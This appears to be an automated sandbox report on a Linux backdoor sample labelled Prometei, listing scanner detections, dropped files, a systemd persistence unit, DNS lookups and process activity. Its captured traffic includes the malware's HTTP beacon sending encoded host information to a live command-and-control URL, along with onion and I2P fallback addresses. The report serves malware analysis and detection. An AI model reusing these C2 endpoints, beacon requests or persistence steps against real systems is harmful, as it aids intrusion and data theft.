behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 583683 Sample: zsvc Startdate: 05/03/2022 Architecture: LINUX Score: 64 68 p3.feefreepool.net 88.198.246.242, 33090, 33092, 80 HETZNER-ASDE Germany 2->68 70 xinchaoafccda.org 2->70 72 2 other IPs or domains 2->72 74 Multi AV Scanner detection for submitted file 2->74 76 Found Tor onion address 2->76 78 Sample is packed with UPX 2->78 11 zsvc 2->11         started        15 systemd uplugplay 2->15         started        signatures3 process4 file5 64 /usr/sbin/uplugplay, ELF 11->64 dropped 80 Drops files in suspicious directories 11->80 82 Sample deletes itself 11->82 17 zsvc sh 11->17         started        19 zsvc sh 11->19         started        21 zsvc sh 11->21         started        25 5 other processes 11->25 23 uplugplay 15->23         started        signatures6 process7 process8 27 sh pgrep 17->27         started        29 sh pgrep 19->29         started        31 sh pidof 21->31         started        33 uplugplay sh 23->33         started        35 sh pgrep 25->35         started        37 sh pidof 25->37         started        39 sh systemctl 25->39         started        41 2 other processes 25->41 process9 43 sh uplugplay 33->43         started        file10 66 /etc/CommId, ASCII 43->66 dropped 46 uplugplay sh 43->46         started        48 uplugplay sh 43->48         started        50 uplugplay sh 43->50         started        52 2 other processes 43->52 process11 process12 54 sh cat 46->54         started        56 sh dmidecode 48->56         started        58 sh cat 50->58         started        60 sh uptime 52->60         started        62 sh uname 52->62         started       
SourceDetectionScannerLabelLink
zsvc39%VirustotalBrowse
zsvc29%MetadefenderBrowse
zsvc57%ReversingLabsLinux.Backdoor.Prometei
SourceDetectionScannerLabelLink
/usr/sbin/uplugplay29%MetadefenderBrowse
/usr/sbin/uplugplay57%ReversingLabsLinux.Backdoor.Prometei
SourceDetectionScannerLabelLink
p3.feefreepool.net9%VirustotalBrowse
SourceDetectionScannerLabelLink
http://p3.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=271872B6X2BPQ1Z2100%Avira URL Cloudmalware
http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rg100%Avira URL Cloudmalware
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
http://p3.feefreepool.net/cgi-bin/prometei.cgi100%Avira URL Cloudmalware
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
http://dummy.zero/cgi-bin/prometei.cgi100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
p3.feefreepool.net
88.198.246.242
truetrueunknown
xinchaoafccda.org
unknown
unknownfalse
    unknown
    xinchaoafccda.net
    unknown
    unknownfalse
      unknown
      xinchaoafccda.com
      unknown
      unknownfalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://p3.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=271872B6X2BPQ1Z2true
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgzsvc, 6808.1.000000000051f000.0000000001286000.rw-.sdmptrue
        • Avira URL Cloud: malware
        unknown
        http://upx.sf.netzsvc, uplugplay.6.drfalse
          high
          http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgizsvc, 6808.1.000000000051f000.0000000001286000.rw-.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://p3.feefreepool.net/cgi-bin/prometei.cgizsvc, 6808.1.000000000051f000.0000000001286000.rw-.sdmptrue
          • Avira URL Cloud: malware
          unknown
          https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgizsvc, 6808.1.000000000051f000.0000000001286000.rw-.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://dummy.zero/cgi-bin/prometei.cgizsvc, 6808.1.000000000051f000.0000000001286000.rw-.sdmptrue
          • Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          88.198.246.242
          p3.feefreepool.netGermany
          24940HETZNER-ASDEtrue
          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          88.198.246.242zJ4GNlikawGet hashmaliciousBrowse
          • p3.feefreepool.net/cgi-bin/prometei.cgi?r=20&i=PG1TCJ8GTFD7733K
          OLzheOx1kwGet hashmaliciousBrowse
          • p3.feefreepool.net/cgi-bin/prometei.cgi?r=16&i=MF97754VWVW4HRWU
          wH04DSYf6gGet hashmaliciousBrowse
          • p3.feefreepool.net/cgi-bin/prometei.cgi?r=16&i=3CL80UN6USPBIKPL
          nRlZAbNdJxGet hashmaliciousBrowse
          • p3.feefreepool.net/cgi-bin/prometei.cgi?r=53&i=5HNN7ZK1006GY32G
          lHxDIlc6HUGet hashmaliciousBrowse
          • p3.feefreepool.net/cgi-bin/prometei.cgi?r=66&i=V9PV9LOR9Q54LN8Z
          PMidZ9jAKZGet hashmaliciousBrowse
          • p3.feefreepool.net/cgi-bin/prometei.cgi?r=58&i=7B1B0KLF45MTZ528
          zsvc.exeGet hashmaliciousBrowse
          • p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271
          3V9alTXIliGet hashmaliciousBrowse
          • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=MKWJIGBKXJXI0948
          promet16Get hashmaliciousBrowse
          • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=0X81G723HYG17S60
          promet15Get hashmaliciousBrowse
          • p1.feefreepool.net/cgi-bin/prometei.cgi?r=18&i=6214X121I3A61W1S
          promet2Get hashmaliciousBrowse
          • p1.feefreepool.net/cgi-bin/prometei.cgi?r=18&i=MU2G1NCM0HDF3L2N
          EKbGofM1r6Get hashmaliciousBrowse
          • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=ENEP5O05YTLM46K2
          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          p3.feefreepool.netzJ4GNlikawGet hashmaliciousBrowse
          • 88.198.246.242
          OLzheOx1kwGet hashmaliciousBrowse
          • 88.198.246.242
          wH04DSYf6gGet hashmaliciousBrowse
          • 88.198.246.242
          nRlZAbNdJxGet hashmaliciousBrowse
          • 88.198.246.242
          lHxDIlc6HUGet hashmaliciousBrowse
          • 88.198.246.242
          PMidZ9jAKZGet hashmaliciousBrowse
          • 88.198.246.242
          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          HETZNER-ASDEeufive_20220304-191420(1).exeGet hashmaliciousBrowse
          • 136.243.172.101
          ZJuHaZVr8bGet hashmaliciousBrowse
          • 144.79.222.182
          YALPR7Kt1G.exeGet hashmaliciousBrowse
          • 49.12.69.202
          eUxH8EE8oJ.dllGet hashmaliciousBrowse
          • 78.47.204.80
          9aplHBuEkg.exeGet hashmaliciousBrowse
          • 148.251.234.83
          V8l19JXrWZ.dllGet hashmaliciousBrowse
          • 78.47.204.80
          0KobEP1Ew5.dllGet hashmaliciousBrowse
          • 78.47.204.80
          deRaQpLgcD.dllGet hashmaliciousBrowse
          • 78.47.204.80
          262ezJj74D.dllGet hashmaliciousBrowse
          • 78.47.204.80
          GwRSSL8V7Q.dllGet hashmaliciousBrowse
          • 78.47.204.80
          HjmFzRgOl8.dllGet hashmaliciousBrowse
          • 78.47.204.80
          2xjFdWayVZ.dllGet hashmaliciousBrowse
          • 78.47.204.80
          uEc1uywY7r.dllGet hashmaliciousBrowse
          • 78.47.204.80
          5yhAizh5K4.dllGet hashmaliciousBrowse
          • 78.47.204.80
          SchoolManagementu.exeGet hashmaliciousBrowse
          • 144.76.136.153
          documentazione-569217376.xlsmGet hashmaliciousBrowse
          • 78.47.204.80
          doc_82555.xlsmGet hashmaliciousBrowse
          • 78.47.204.80
          Loader v7.3.8.exeGet hashmaliciousBrowse
          • 144.76.136.153
          report 826.xlsmGet hashmaliciousBrowse
          • 78.47.204.80
          hTNQqMy0Td.dllGet hashmaliciousBrowse
          • 78.47.204.80
          No context
          No context
          Process:/usr/sbin/uplugplay
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):16
          Entropy (8bit):3.125
          Encrypted:false
          SSDEEP:3:yBrf:k
          MD5:BBA52E97BA0A0E0865922C808110DC1F
          SHA1:079AC2E4EB0F89F28DC6920203B575C9C21C82F2
          SHA-256:B861FB16D047CE7601F245DCA34565DE3B91CD9690B4B5DD7965E2A87A4AED89
          SHA-512:49B08749E89D08A95180B1B6162535C66A29DEE6679F39796D3A532F120C7D8C2BFBE7E55894EE0F2C68291DAC6FE81CB5B8FA8CE77D55297F8E06BAAF94EB02
          Malicious:true
          Reputation:low
          Preview:271872B6X2BPQ1Z2
          Process:/tmp/zsvc
          File Type:ASCII text
          Category:dropped
          Size (bytes):145
          Entropy (8bit):4.769509838572339
          Encrypted:false
          SSDEEP:3:zMZa75X1PxQJqtWA1+DRvBADMikAdIgQ+aQmNJX4ev+sirSkQmWA1+DRvn:z8uXcqtWA4RZAMD+aBNdhTILQmWA4Rv
          MD5:8CA62D1F47880BCE036C2956C9B7B272
          SHA1:3BCC3A5C4FCC5B0D08C4524A59F6B8E113B62060
          SHA-256:C655D3D4E374FAD38313EC4262207B2D7D68A870238F203EF3C33F85E66C8E32
          SHA-512:4CD2D9D67151FA25E833707DEE2442C4A5F752053FC2C36EC73C0E2B734C66CA69C63FCEB47714D9ADD5B9FE2EEE1E45BE5199E2CAE7C26173E766B333877DA6
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:[Unit].Description=UPlugPlay.After=multi-user.target..[Service].Type=forking.ExecStart=/usr/sbin/uplugplay..[Install].WantedBy=multi-user.target.
          Process:/tmp/zsvc
          File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
          Category:dropped
          Size (bytes):426571
          Entropy (8bit):7.9421347952552654
          Encrypted:false
          SSDEEP:12288:vuUGbSUQf6LndsBl8c7Imd7Bb7PfZwZfYEmvozMy6:vuuujdCr7X57HZwVEoi
          MD5:991FC745E45B15D782D13330E051D001
          SHA1:2B55AD9F8BB2D9CD483F382B172B0AC6D8878B39
          SHA-256:1D1A234975BAB10C6409FA5FDE405CE3C5E65832C020F8FBD2958E1577065737
          SHA-512:4FA95F59FBA641AC50E8B838C18F2084BC93865521CB028862322673F2CA4A9F242F137771A8E431E325457A10CE5F81B623B4AC36431898F6102BF9F2BED936
          Malicious:true
          Yara Hits:
          • Rule: SUSP_ELF_LNX_UPX_Compressed_File, Description: Detects a suspicious ELF binary with UPX compression, Source: /usr/sbin/uplugplay, Author: Florian Roth
          Antivirus:
          • Antivirus: Metadefender, Detection: 29%, Browse
          • Antivirus: ReversingLabs, Detection: 57%
          Reputation:low
          Preview:.ELF..............>......pF.....@...................@.8...@.......................@.......@......y.......y................................F.......F.............................Q.td....................................................k&1FUPX!$........(...(..p............. ..ELF......>....@........ .'8..........W.3c..-.......o..K>...@Q....obo...N...|...o...={...-.Q.`XO...m..o..p..@.... ....on.....D_D..uK...O._.m(.S.tdO..n.Qn....s;.oRO.....0...*I.$.P.............y......GNU....'..l......?...y1qN...v.r=Q...!`X.,........_....Q.%.yr...SM./P..^...p.D.....BF.0.....]....K........y.../..p........LG...._...#/v..._P.C2.b.`...y!#...x0...@p..d.L.h..`r!#/..X...vP_./H....@?.TM"8..8.0O...`(...q.\. ..O.$ar .@%I.Q....]...I-.n.......H...H...H..t..."...9.....?..%......D................................}....ume....]U....ME=....5-%..................-..E.t$..T$.<{....%.....H.|$.....9.g...Sd2.OH.. ......kn(...$. 1.H9.`K..t>d....4..u......>2..w..H.. -U.H.=$...o....... ......=.._w.Ru6...k....N.y.
          File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
          Entropy (8bit):7.9421347952552654
          TrID:
          • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
          • ELF Executable and Linkable format (generic) (4004/1) 49.84%
          File name:zsvc
          File size:426571
          MD5:991fc745e45b15d782d13330e051d001
          SHA1:2b55ad9f8bb2d9cd483f382b172b0ac6d8878b39
          SHA256:1d1a234975bab10c6409fa5fde405ce3c5e65832c020f8fbd2958e1577065737
          SHA512:4fa95f59fba641ac50e8b838c18f2084bc93865521cb028862322673f2ca4a9f242f137771a8e431e325457a10ce5f81b623b4ac36431898f6102bf9f2bed936
          SSDEEP:12288:vuUGbSUQf6LndsBl8c7Imd7Bb7PfZwZfYEmvozMy6:vuuujdCr7X57HZwVEoi
          File Content Preview:.ELF..............>......pF.....@...................@.8...@.......................@.......@......y.......y................................F.......F.............................Q.td....................................................k&1FUPX!$........(...(.

          ELF header

          Class:ELF64
          Data:2's complement, little endian
          Version:1 (current)
          Machine:Advanced Micro Devices X86-64
          Version Number:0x1
          Type:EXEC (Executable file)
          OS/ABI:UNIX - System V
          ABI Version:0
          Entry Point Address:0x467088
          Flags:0x0
          ELF Header Size:64
          Program Header Offset:64
          Program Header Size:56
          Number of Program Headers:3
          Section Header Offset:0
          Section Header Size:64
          Number of Section Headers:0
          Header String Table Index:0
          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
          LOAD0x00x4000000x4000000x679a30x679a34.33740x5R E0x1000
          LOAD0x00x4680000x4680000x00xe1d4980.00000x6RW 0x1000
          GNU_STACK0x00x00x00x00x00.00000x6RW 0x10
          TimestampSource PortDest PortSource IPDest IP
          Mar 5, 2022 18:00:50.239248991 CET3309080192.168.2.2088.198.246.242
          Mar 5, 2022 18:00:50.262495041 CET803309088.198.246.242192.168.2.20
          Mar 5, 2022 18:00:50.262767076 CET3309080192.168.2.2088.198.246.242
          Mar 5, 2022 18:00:50.263353109 CET3309080192.168.2.2088.198.246.242
          Mar 5, 2022 18:00:50.317595959 CET803309088.198.246.242192.168.2.20
          Mar 5, 2022 18:00:50.317651033 CET803309088.198.246.242192.168.2.20
          Mar 5, 2022 18:00:50.318099022 CET3309080192.168.2.2088.198.246.242
          Mar 5, 2022 18:00:50.318144083 CET3309080192.168.2.2088.198.246.242
          Mar 5, 2022 18:00:50.340490103 CET803309088.198.246.242192.168.2.20
          Mar 5, 2022 18:00:50.472883940 CET3309280192.168.2.2088.198.246.242
          Mar 5, 2022 18:00:50.494786024 CET803309288.198.246.242192.168.2.20
          Mar 5, 2022 18:00:50.495035887 CET3309280192.168.2.2088.198.246.242
          Mar 5, 2022 18:00:50.495316982 CET3309280192.168.2.2088.198.246.242
          Mar 5, 2022 18:00:50.553150892 CET803309288.198.246.242192.168.2.20
          Mar 5, 2022 18:00:50.553462029 CET803309288.198.246.242192.168.2.20
          Mar 5, 2022 18:00:50.553647041 CET3309280192.168.2.2088.198.246.242
          Mar 5, 2022 18:00:50.553692102 CET3309280192.168.2.2088.198.246.242
          Mar 5, 2022 18:00:50.575483084 CET803309288.198.246.242192.168.2.20
          TimestampSource PortDest PortSource IPDest IP
          Mar 5, 2022 18:00:50.218703032 CET4934253192.168.2.208.8.8.8
          Mar 5, 2022 18:00:50.238817930 CET53493428.8.8.8192.168.2.20
          Mar 5, 2022 18:00:50.454821110 CET3627553192.168.2.208.8.8.8
          Mar 5, 2022 18:00:50.472604036 CET53362758.8.8.8192.168.2.20
          Mar 5, 2022 18:00:51.520899057 CET3364880192.168.2.2088.198.246.242
          Mar 5, 2022 18:02:51.672333002 CET4854153192.168.2.208.8.8.8
          Mar 5, 2022 18:02:51.692214012 CET53485418.8.8.8192.168.2.20
          Mar 5, 2022 18:02:51.693572044 CET4561553192.168.2.208.8.8.8
          Mar 5, 2022 18:02:51.716672897 CET3364880192.168.2.2088.198.246.242
          Mar 5, 2022 18:02:51.775576115 CET53456158.8.8.8192.168.2.20
          Mar 5, 2022 18:02:51.777101994 CET3996753192.168.2.208.8.8.8
          Mar 5, 2022 18:02:51.803783894 CET53399678.8.8.8192.168.2.20
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
          Mar 5, 2022 18:00:50.218703032 CET192.168.2.208.8.8.80x1b4eStandard query (0)p3.feefreepool.netA (IP address)IN (0x0001)
          Mar 5, 2022 18:00:50.454821110 CET192.168.2.208.8.8.80x1b4eStandard query (0)p3.feefreepool.netA (IP address)IN (0x0001)
          Mar 5, 2022 18:02:51.672333002 CET192.168.2.208.8.8.80x1b4eStandard query (0)xinchaoafccda.netA (IP address)IN (0x0001)
          Mar 5, 2022 18:02:51.693572044 CET192.168.2.208.8.8.80x1b4eStandard query (0)xinchaoafccda.orgA (IP address)IN (0x0001)
          Mar 5, 2022 18:02:51.777101994 CET192.168.2.208.8.8.80x1b4eStandard query (0)xinchaoafccda.comA (IP address)IN (0x0001)
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
          Mar 5, 2022 18:00:50.238817930 CET8.8.8.8192.168.2.200x1b4eNo error (0)p3.feefreepool.net88.198.246.242A (IP address)IN (0x0001)
          Mar 5, 2022 18:00:50.472604036 CET8.8.8.8192.168.2.200x1b4eNo error (0)p3.feefreepool.net88.198.246.242A (IP address)IN (0x0001)
          Mar 5, 2022 18:02:51.692214012 CET8.8.8.8192.168.2.200x1b4eName error (3)xinchaoafccda.netnonenoneA (IP address)IN (0x0001)
          Mar 5, 2022 18:02:51.775576115 CET8.8.8.8192.168.2.200x1b4eName error (3)xinchaoafccda.orgnonenoneA (IP address)IN (0x0001)
          Mar 5, 2022 18:02:51.803783894 CET8.8.8.8192.168.2.200x1b4eName error (3)xinchaoafccda.comnonenoneA (IP address)IN (0x0001)
          • p3.feefreepool.net
          Session IDSource IPSource PortDestination IPDestination Port
          0192.168.2.203309088.198.246.24280
          TimestampkBytes transferredDirectionData
          Mar 5, 2022 18:00:50.263353109 CET0OUTGET /cgi-bin/prometei.cgi?r=0&i=271872B6X2BPQ1Z2 HTTP/1.0
          Host: p3.feefreepool.net
          Mar 5, 2022 18:00:50.317595959 CET0INHTTP/1.1 200 OK
          Date: Sat, 05 Mar 2022 17:01:01 GMT
          Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6
          Content-Length: 7
          Connection: close
          Content-Type: text/html; charset=windows-1251
          Data Raw: 73 79 73 69 6e 66 6f
          Data Ascii: sysinfo


          Session IDSource IPSource PortDestination IPDestination Port
          1192.168.2.203309288.198.246.24280
          TimestampkBytes transferredDirectionData
          Mar 5, 2022 18:00:50.495316982 CET2OUTGET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wM0xfVW5peDY0DQp1YnVudHUtYW5hbHl6ZXINCg0KMXggSW50ZWwoUikgWGVvbihSKSBTaWx2ZXIgNDIxMCBDUFUgQCAyLjIwR0h6DQoNCkludGVsIENvcnBvcmF0aW9uDQo0NDBCWCBEZXNrdG9wIFJlZmVyZW5jZSBQbGF0Zm9ybQ0KDQoNClVidW50dSAmIDE2LjA0LjQgTFRTIChYZW5pYWwgWGVydXMpIA0KDQovdXNyL3NiaW4vDQogMTk6MDA6NDkgdXAgMTEgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAwLjY4LCAwLjQxLCAwLjI0DQpMaW51eCB1YnVudHUtYW5hbHl6ZXIgNC40LjAtMTE2LWdlbmVyaWMgIzE0MC1VYnVudHUgU01QIE1vbiBGZWIgMTIgMjE6MjM6MDQgVVRDIDIwMTggeDg2XzY0IHg4Nl82NCB4ODZfNjQgR05VL0xpbnV4DQp9DQo_&i=271872B6X2BPQ1Z2&h=ubuntu-analyzer&enckey=MWeBNERSK13fL5ino/38JcZmxqZkaDYu88S23tMT3P9vU0AyeLBlZKGc4715p+agYHec0aVmH6ZpFasRt35KWPbwFYSI/vyf/KwkgBozVtD5TSC8dhEnrLU+GsGwxzBSMgwanvcI9Yluv0p9nHhu+2lHpIBL/4IZHBholdXGj1g= HTTP/1.0
          Host: p3.feefreepool.net
          Mar 5, 2022 18:00:50.553150892 CET2INHTTP/1.1 200 OK
          Date: Sat, 05 Mar 2022 17:01:02 GMT
          Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6
          Content-Length: 3
          Connection: close
          Content-Type: text/html; charset=windows-1251
          Data Raw: 6f 6b 21 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a
          Data Ascii: ok!Content-type: text/html; charset=windows-1251


          System Behavior

          Start time:18:00:44
          Start date:05/03/2022
          Path:/tmp/zsvc
          Arguments:/tmp/zsvc
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:44
          Start date:05/03/2022
          Path:/tmp/zsvc
          Arguments:n/a
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:44
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:sh -c "pgrep zsvc"
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:44
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:n/a
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:44
          Start date:05/03/2022
          Path:/usr/bin/pgrep
          Arguments:pgrep zsvc
          File size:27280 bytes
          MD5 hash:f3b843351a404d4e8d4ce0ed0775fa9c

          Start time:18:00:44
          Start date:05/03/2022
          Path:/tmp/zsvc
          Arguments:n/a
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:44
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:sh -c "pgrep uplugplay"
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:44
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:n/a
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:44
          Start date:05/03/2022
          Path:/usr/bin/pgrep
          Arguments:pgrep uplugplay
          File size:27280 bytes
          MD5 hash:f3b843351a404d4e8d4ce0ed0775fa9c

          Start time:18:00:45
          Start date:05/03/2022
          Path:/tmp/zsvc
          Arguments:n/a
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:45
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:sh -c "pidof uplugplay"
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:45
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:n/a
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:45
          Start date:05/03/2022
          Path:/bin/pidof
          Arguments:pidof uplugplay
          File size:14 bytes
          MD5 hash:1927a3fb9f656f7b53b72c92cbbecfe9

          Start time:18:00:46
          Start date:05/03/2022
          Path:/tmp/zsvc
          Arguments:n/a
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:46
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:sh -c "pgrep upnpsetup"
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:46
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:n/a
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:46
          Start date:05/03/2022
          Path:/usr/bin/pgrep
          Arguments:pgrep upnpsetup
          File size:27280 bytes
          MD5 hash:f3b843351a404d4e8d4ce0ed0775fa9c

          Start time:18:00:47
          Start date:05/03/2022
          Path:/tmp/zsvc
          Arguments:n/a
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:47
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:sh -c "pidof upnpsetup"
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:47
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:n/a
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:47
          Start date:05/03/2022
          Path:/bin/pidof
          Arguments:pidof upnpsetup
          File size:14 bytes
          MD5 hash:1927a3fb9f656f7b53b72c92cbbecfe9

          Start time:18:00:48
          Start date:05/03/2022
          Path:/tmp/zsvc
          Arguments:n/a
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:48
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:sh -c "systemctl daemon-reload"
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:48
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:n/a
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:48
          Start date:05/03/2022
          Path:/bin/systemctl
          Arguments:systemctl daemon-reload
          File size:659848 bytes
          MD5 hash:b08096235b8c90203e17721264b5ce40

          Start time:18:00:49
          Start date:05/03/2022
          Path:/tmp/zsvc
          Arguments:n/a
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:sh -c "systemctl enable uplugplay.service"
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:n/a
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/systemctl
          Arguments:systemctl enable uplugplay.service
          File size:659848 bytes
          MD5 hash:b08096235b8c90203e17721264b5ce40

          Start time:18:00:49
          Start date:05/03/2022
          Path:/tmp/zsvc
          Arguments:n/a
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:sh -c "systemctl start uplugplay.service"
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:n/a
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/systemctl
          Arguments:systemctl start uplugplay.service
          File size:659848 bytes
          MD5 hash:b08096235b8c90203e17721264b5ce40

          Start time:18:00:49
          Start date:05/03/2022
          Path:/lib/systemd/systemd
          Arguments:n/a
          File size:0 bytes
          MD5 hash:unknown

          Start time:18:00:49
          Start date:05/03/2022
          Path:/usr/sbin/uplugplay
          Arguments:/usr/sbin/uplugplay
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:49
          Start date:05/03/2022
          Path:/usr/sbin/uplugplay
          Arguments:n/a
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:49
          Start date:05/03/2022
          Path:/usr/sbin/uplugplay
          Arguments:n/a
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:sh -c "/usr/sbin/uplugplay -Dcomsvc"
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:n/a
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:49
          Start date:05/03/2022
          Path:/usr/sbin/uplugplay
          Arguments:/usr/sbin/uplugplay -Dcomsvc
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:49
          Start date:05/03/2022
          Path:/usr/sbin/uplugplay
          Arguments:n/a
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:sh -c "cat /proc/cpuinfo"
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:n/a
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/cat
          Arguments:cat /proc/cpuinfo
          File size:52080 bytes
          MD5 hash:efa10d52f37361f2e3a5d22742f0fcc4

          Start time:18:00:49
          Start date:05/03/2022
          Path:/usr/sbin/uplugplay
          Arguments:n/a
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:sh -c "dmidecode --type baseboard"
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:n/a
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:49
          Start date:05/03/2022
          Path:/usr/sbin/dmidecode
          Arguments:dmidecode --type baseboard
          File size:104952 bytes
          MD5 hash:cdb63a6daba7a995ddd1d3d0a5fef8a6

          Start time:18:00:49
          Start date:05/03/2022
          Path:/usr/sbin/uplugplay
          Arguments:n/a
          File size:426571 bytes
          MD5 hash:991fc745e45b15d782d13330e051d001

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:sh -c "cat /etc/os-release"
          File size:4 bytes
          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

          Start time:18:00:49
          Start date:05/03/2022
          Path:/bin/sh
          Arguments:n/a
          File size:4 bytes
